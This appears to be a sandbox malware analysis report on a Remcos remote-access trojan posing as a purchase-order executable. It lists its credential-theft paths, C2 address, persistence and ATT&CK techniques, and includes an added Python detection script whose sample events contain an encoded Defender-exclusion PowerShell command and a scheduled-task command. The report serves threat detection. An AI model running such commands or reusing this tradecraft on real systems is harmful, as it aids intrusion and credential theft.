                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Queries volume information: C:\Users\user\AppData\Roaming\keHuNxIumw.exe VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,12_2_0041A045
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041B69E GetUserNameW,12_2_0041B69E
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449210
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                       Source: Yara match | File source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                       Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                       Source: Yara match | File source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                       Source: Yara match | File source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                       Source: Yara match | File source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                       Source: Yara match | File source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA4D
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB6B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \key3.db12_2_0040BB6B

                      Remote Access Functionality

Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZ
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZ
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, Code function 12_2_0040569A references: cmd.exe
MITRE ATT&CK Matrix

The matrix was flattened during extraction and is listed here per tactic. The number in parentheses is the count the matrix shows for that cell; techniques without a count are the unmatched cells of the matrix template.

Reconnaissance: no matches (template: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances)
Resource Development: no matches (template: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains)
Initial Access: no matches (template: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools)
Execution: Native API (1), Command and Scripting Interpreter (1), Scheduled Task/Job (1), Service Execution (2); unmatched: Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript
Persistence: DLL Side-Loading (1), Windows Service (1), Scheduled Task/Job (1); unmatched: Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd
Privilege Escalation: DLL Side-Loading (1), Bypass User Account Control (1), Access Token Manipulation (1), Windows Service (1), Process Injection (122), Scheduled Task/Job (1); unmatched: Startup Items, Scheduled Task/Job, At, Cron, Launchd
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (22), Timestomp (1), DLL Side-Loading (1), Bypass User Account Control (1), Masquerading (1), Virtualization/Sandbox Evasion (31), Access Token Manipulation (1), Process Injection (122)
Credential Access: OS Credential Dumping (1), Input Capture (111), Credentials In Files (2); unmatched: NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: System Time Discovery (2), Account Discovery (1), System Service Discovery (1), File and Directory Discovery (3), System Information Discovery (33), Security Software Discovery (121), Virtualization/Sandbox Evasion (31), Process Discovery (3), Application Window Discovery (1), System Owner/User Discovery (1); unmatched: System Network Connections Discovery
Lateral Movement: no matches (template: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools)
Collection: Archive Collected Data (11), Input Capture (111), Clipboard Data (3); unmatched: Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Command and Control: Ingress Tool Transfer (12), Encrypted Channel (2), Remote Access Software (1), Non-Application Layer Protocol (2), Application Layer Protocol (12); unmatched: Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Exfiltration: no matches (template: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol)
Impact: System Shutdown/Reboot (1), Defacement (1); unmatched: Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption
Behavior Graph (ID: 1541115, Sample: Supplier Purchase Order - PO0002491.exe, Start date: 24/10/2024, Architecture: WINDOWS, Score: 100)

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures. Contacted domain: geoplugin.net. The number after a process name is the counter the graph attaches to that node.

Supplier Purchase Order - PO0002491.exe (7)
  dropped: C:\Users\user\AppData\...\keHuNxIumw.exe (PE32)
  dropped: C:\Users\...\keHuNxIumw.exe:Zone.Identifier (ASCII)
  dropped: C:\Users\user\AppData\Local\...\tmp9421.tmp (XML)
  dropped: Supplier Purchase ...- PO0002491.exe.log (ASCII)
  signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  +-- Supplier Purchase Order - PO0002491.exe (3 13), signature: Detected Remcos RAT
  |     192.210.150.14, ports 2404 / 49708, AS-COLOCROSSINGUS, United States
  |     geoplugin.net 178.237.33.50, ports 49710 / 80, ATOM86-ASATOM86NL, Netherlands
  +-- powershell.exe (23), signature: Loading BitLocker PowerShell Module
  |     +-- WmiPrvSE.exe
  |     +-- conhost.exe
  +-- schtasks.exe (1)
        +-- conhost.exe

keHuNxIumw.exe (5)
  signatures: Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; 5 other signatures
  +-- keHuNxIumw.exe
  +-- schtasks.exe (1)
        +-- conhost.exe
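The process tree and network contacts above, together with the scheduled-task, Defender-exclusion and mutex findings earlier in the report, are the observables a responder would want to hunt for on other hosts. The following is an added example, not part of the Joe Sandbox report: it applies those observables as detection rules over Sysmon-style events. The event dictionary layout and field names are an assumed simplification of Sysmon's process, network, DNS and file events, and the sample events at the bottom are constructed for the demonstration (the exact schtasks and PowerShell command lines are not printed in the report; only their effects are).

```python
"""Hunt for the observables of Joe Sandbox analysis 1541115 (Remcos) in
Sysmon-style events. Added example; not code from the report."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Observables taken from the report.
C2_IP, C2_PORT = "192.210.150.14", 2404            # Remcos C2 (AS-COLOCROSSING)
GEOIP_HOST = "geoplugin.net"                       # geolocation check made by the RAT
DROPPED_EXE = r"\appdata\roaming\kehunxiumw.exe"   # persistence copy of the sample
TASK_NAME = "kehunxiumw"                           # scheduled task created for that copy
BROWSERS = ("chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe")


@dataclass(frozen=True)
class Hit:
    rule: str
    pid: int
    detail: str


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the script behind powershell -EncodedCommand (base64 of UTF-16LE).
    Returns None when there is no encoded argument or it does not decode."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(events: list[dict]) -> list[Hit]:
    """Apply the report-derived rules to the events and return every hit, in order."""
    hits: list[Hit] = []
    for ev in events:
        pid = ev["ProcessId"]
        image = ev.get("Image", "").lower()
        exe = image.rsplit("\\", 1)[-1]
        kind = ev["EventType"]
        if kind == "NetworkConnect":
            if ev["DestinationIp"] == C2_IP and ev["DestinationPort"] == C2_PORT:
                hits.append(Hit("remcos_c2_connect", pid, f"{exe} -> {C2_IP}:{C2_PORT}"))
        elif kind == "DnsQuery":
            # geoplugin.net is legitimate; the signal is a non-browser resolving it.
            if ev["QueryName"].lower() == GEOIP_HOST and exe not in BROWSERS:
                hits.append(Hit("geoip_lookup_non_browser", pid, f"{exe} resolved {GEOIP_HOST}"))
        elif kind == "FileCreate":
            if ev["TargetFilename"].lower().endswith(DROPPED_EXE):
                hits.append(Hit("remcos_dropped_copy", pid, ev["TargetFilename"]))
        elif kind == "ProcessCreate":
            cmd = ev.get("CommandLine", "")
            low = cmd.lower()
            # Task registered from a temp XML or under the dropped file's name.
            if exe == "schtasks.exe" and "/create" in low and (TASK_NAME in low or ".tmp" in low):
                hits.append(Hit("schtasks_persistence", pid, cmd))
            elif exe == "powershell.exe":
                decoded = decode_encoded_command(cmd)
                if decoded and re.search(r"add-mppreference.*-exclusionpath", decoded, re.I):
                    hits.append(Hit("defender_exclusion_encoded", pid, decoded))
    return hits


def _encoded(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (test helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events for this example; they are not taken from the report.
SAMPLE_EVENTS = [
    {"EventType": "FileCreate", "ProcessId": 1868,
     "Image": r"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\keHuNxIumw.exe"},
    {"EventType": "ProcessCreate", "ProcessId": 2320,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand "
                    + _encoded('Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"')},
    {"EventType": "ProcessCreate", "ProcessId": 2412, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN "keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"'},
    {"EventType": "DnsQuery", "ProcessId": 5972,
     "Image": r"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", "QueryName": "geoplugin.net"},
    {"EventType": "NetworkConnect", "ProcessId": 5972,
     "Image": r"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe",
     "DestinationIp": "192.210.150.14", "DestinationPort": 2404},
    {"EventType": "DnsQuery", "ProcessId": 4100,          # benign: a browser resolving the same host
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "QueryName": "geoplugin.net"},
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h.rule}] pid={h.pid} {h.detail}")
```

The geoplugin.net rule deliberately keys on the requesting process rather than the domain: the report itself rates the URL as safe, so the domain alone is not an indicator, whereas a non-browser process resolving it immediately before an outbound connection to 192.210.150.14:2404 is the Remcos pattern seen above. The mutex Rmc-GOFAGZ is not covered because Sysmon does not record mutex creation; check it live with a handle enumeration tool instead.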

Antivirus and Machine Learning Detection

Initial Sample
Source | Detection | Scanner | Label
Supplier Purchase Order - PO0002491.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
Supplier Purchase Order - PO0002491.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\keHuNxIumw.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\keHuNxIumw.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos

Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown

URLs from Memory and Binaries (trailing characters after a URL are string-extraction residue from the memory dump)
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/ | Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP# | keHuNxIumw.exe, 00000008.00000002.2241166985.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp/C | Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp; Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp; keHuNxIumw.exe, 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2161767525.00000000033C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpSystem32 | Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://tempuri.org/DataSet1.xsd | Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr | false | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
192.210.150.14 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1541115
                                  Start date and time:2024-10-24 12:57:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Supplier Purchase Order - PO0002491.exe
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/12@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 78
                                  • Number of non-executed functions: 219
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: Supplier Purchase Order - PO0002491.exe
Time | Type | Description
06:58:10 | API Interceptor | 4370903x Sleep call for process: Supplier Purchase Order - PO0002491.exe modified
06:58:11 | API Interceptor | 16x Sleep call for process: powershell.exe modified
06:58:18 | API Interceptor | 1x Sleep call for process: keHuNxIumw.exe modified
12:58:13 | Task Scheduler | Run new task: keHuNxIumw path: C:\Users\user\AppData\Roaming\keHuNxIumw.exe
Match: 178.237.33.50
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | malicious | Remcos | geoplugin.net/json.gp
Belialist.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
#PO247762.docx | malicious | Remcos | geoplugin.net/json.gp
PO NAHK22012FA00000.docx.doc | malicious | Remcos | geoplugin.net/json.gp
ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
Unicredit.Pagamento.pdf.exe | malicious | Remcos | geoplugin.net/json.gp
1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | geoplugin.net/json.gp
EX0096959.docx.doc | malicious | Remcos | geoplugin.net/json.gp
Match: geoplugin.net
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | malicious | Remcos | 178.237.33.50
Belialist.exe | malicious | Remcos, GuLoader | 178.237.33.50
#PO247762.docx | malicious | Remcos | 178.237.33.50
PO NAHK22012FA00000.docx.doc | malicious | Remcos | 178.237.33.50
ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 178.237.33.50
SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | 178.237.33.50
Unicredit.Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 178.237.33.50
nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 178.237.33.50
EX0096959.docx.doc | malicious | Remcos | 178.237.33.50
Match: AS-COLOCROSSINGUS
Associated Sample Name / URL | Detection | Threat Name | Context
bot.arm7.elf | malicious | Mirai, Okiru | 192.210.187.71
bot.arm.elf | malicious | Mirai, Okiru | 192.210.187.71
bot.m68k.elf | malicious | Mirai, Okiru | 192.210.187.71
transferencia interbancaria_66579.xlam.xlsx | malicious | AgentTesla | 107.172.31.13
Comprobante de pago.xlam.xlsx | malicious | Unknown | 192.3.216.142
Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | 198.46.178.134
Shipping Documents WMLREF115900.xls | malicious | Lokibot | 192.3.176.141
A & C Metrology OC 5457144.xls | malicious | Unknown | 192.210.215.8
#PO247762.docx | malicious | Remcos | 104.168.7.51
la.bot.arm7.elf | malicious | Unknown | 192.3.165.37
Match: ATOM86-ASATOM86NL
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | malicious | Remcos | 178.237.33.50
Belialist.exe | malicious | Remcos, GuLoader | 178.237.33.50
#PO247762.docx | malicious | Remcos | 178.237.33.50
PO NAHK22012FA00000.docx.doc | malicious | Remcos | 178.237.33.50
ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 178.237.33.50
SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | 178.237.33.50
Unicredit.Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 178.237.33.50
nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 178.237.33.50
EX0096959.docx.doc | malicious | Remcos | 178.237.33.50
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:true
                                  Reputation:high, very likely benign file
